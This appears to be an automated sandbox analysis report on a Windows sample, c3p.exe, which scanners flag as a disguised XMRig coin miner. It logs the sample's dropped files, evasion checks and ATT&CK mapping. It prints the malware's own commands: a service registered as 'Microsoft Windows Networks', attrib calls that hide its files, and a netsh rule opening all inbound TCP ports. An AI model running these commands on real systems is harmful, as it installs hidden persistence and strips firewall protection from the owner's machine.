Source: C:\Users\user\Desktop\c3p.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\c3p.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Users\user\Desktop\c3p.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\c3p.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: c3p.exe

Static file information: File size 3127301 > 1048576

Source: c3p.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: c3p.exe
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.dr

Source: C:\Users\user\Desktop\c3p.exe

Code function: 2_2_004252D5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

2_2_004252D5

Source: C:\Users\user\Desktop\c3p.exe

File created: C:\Windows\debug\c3p\__tmp_rar_sfx_access_check_6055437

Jump to behavior

Source: systems.exe.2.dr

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041A05C push eax; ret	2_2_0041A07A
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041F6A1 push ecx; ret	2_2_0041F6B4
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 5_2_00416ABD push ecx; ret	5_2_00416AD0
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 9_2_00416ABD push ecx; ret	9_2_00416AD0

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\c3p.exe

File created: C:\Windows\debug\c3p\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\cmd.exe	Executable created and started: C:\Windows\debug\c3p\svchost.exe			Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Executable created and started: C:\Windows\debug\c3p\systems.exe			Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\c3p.exe

File created: C:\Windows\debug\c3p\WinRing0x64.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior

Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\systems.exe	Jump to dropped file

Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\user\Desktop\c3p.exe	File created: C:\Windows\debug\c3p\systems.exe	Jump to dropped file

Source: C:\Windows\debug\c3p\svchost.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Networks2\Parameters

Jump to behavior

Source: C:\Windows\System32\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config

Jump to behavior

Source: C:\Windows\debug\c3p\svchost.exe

Code function: 5_2_00409B70 __fileno,__setmode,__fileno,__setmode,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,

5_2_00409B70

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\sc.exe sc config "Networks2" DisplayName= "Networksrs2"

Source: C:\Users\user\Desktop\c3p.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\debug\c3p\systems.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\debug\c3p\systems.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\debug\c3p\svchost.exe	Code function: HeapAlloc,OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,GetLastError,EnumServicesStatusW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusW,GetLastError,GetLastError,GetProcessHeap,HeapFree,GetLastError,__snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,		5_2_0040CAB0
Source: C:\Windows\debug\c3p\svchost.exe	Code function: HeapAlloc,OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,GetLastError,EnumServicesStatusW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusW,GetLastError,GetLastError,GetProcessHeap,HeapFree,GetLastError,__snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,		9_2_0040CAB0

Source: C:\Users\user\Desktop\c3p.exe

Dropped PE file which has not been started: C:\Windows\debug\c3p\WinRing0x64.sys

Jump to dropped file

Source: C:\Windows\debug\c3p\svchost.exe

Evaded block: after key decision

graph_9-12049

Source: C:\Windows\debug\c3p\svchost.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_9-11347

Source: C:\Windows\debug\c3p\svchost.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_5-10430
Source: C:\Users\user\Desktop\c3p.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_2-18769

Source: C:\Windows\debug\c3p\svchost.exe

API coverage: 3.0 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_004091FE FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		2_2_004091FE
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0040DB4F SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		2_2_0040DB4F

Source: c3p.exe, 00000002.00000002.1358888782.00000000007AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: c3p.exe, 00000002.00000002.1358888782.00000000007AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: systems.exe, 0000000F.00000002.2581684735.000001A465959000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: c3p.exe	Binary or memory string: jVMci
Source: svchost.exe, 00000000.00000002.2581480577.00000173B3431000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\c3p.exe

Code function: 2_2_0041E29E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0041E29E

Source: C:\Users\user\Desktop\c3p.exe

2_2_004252D5

Source: C:\Windows\debug\c3p\svchost.exe

Code function: 5_2_0040EC60 __snwprintf_s,ChangeServiceConfigW,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetLastError,

5_2_0040EC60

Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0042308E SetUnhandledExceptionFilter,	2_2_0042308E
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041E29E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041E29E
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_00423B49 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	2_2_00423B49
Source: C:\Users\user\Desktop\c3p.exe	Code function: 2_2_0041FB9B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041FB9B
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 5_2_00412CDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00412CDC
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 5_2_0041BD69 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0041BD69
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 5_2_00415360 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00415360
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 5_2_004187C4 SetUnhandledExceptionFilter,	5_2_004187C4
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 9_2_00412CDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00412CDC
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 9_2_0041BD69 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0041BD69
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 9_2_00415360 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00415360
Source: C:\Windows\debug\c3p\svchost.exe	Code function: 9_2_004187C4 SetUnhandledExceptionFilter,	9_2_004187C4

Source: C:\Users\user\Desktop\c3p.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\debug\c3p\svchost.exe C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc config "Networks2" DisplayName= "Networksrs2"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc description "Networks2" "Microsoft Windows Networks"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc start "Networks2"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p +h +a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.json +h +a +s +r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.exe +h +a +s +r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow	Jump to behavior
Source: C:\Windows\debug\c3p\svchost.exe	Process created: C:\Windows\debug\c3p\systems.exe "C:\WINDOWS\Debug\c3p\systems.exe"	Jump to behavior

Source: C:\Windows\debug\c3p\svchost.exe

Code function: 5_2_00409920 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

5_2_00409920

Source: C:\Users\user\Desktop\c3p.exe

Code function: 2_2_00410A5D cpuid

2_2_00410A5D

Source: C:\Users\user\Desktop\c3p.exe	Code function: GetLocaleInfoA,	2_2_00425AB0
Source: C:\Users\user\Desktop\c3p.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	2_2_0040CE48
Source: C:\Windows\debug\c3p\svchost.exe	Code function: GetLocaleInfoA,	5_2_0041C465
Source: C:\Windows\debug\c3p\svchost.exe	Code function: GetLocaleInfoA,	9_2_0041C465

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\c3p.exe

Code function: 2_2_00423965 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_00423965

Source: C:\Users\user\Desktop\c3p.exe

Code function: 2_2_0040998E GetVersionExW,

2_2_0040998E

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	4 Native API	1 Scripting	1 DLL Side-Loading	2 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Service Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	13 Service Execution	44 Windows Service	44 Windows Service	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Process Injection	1 Software Packing	NTDS	33 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	221 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
c3p.exe	68%	ReversingLabs	Win32.Trojan.DisguisedXMRigMiner
c3p.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\debug\c3p\systems.exe	100%	Avira	PUA/CoinMiner.bencb
C:\Windows\debug\c3p\systems.exe	100%	Joe Sandbox ML
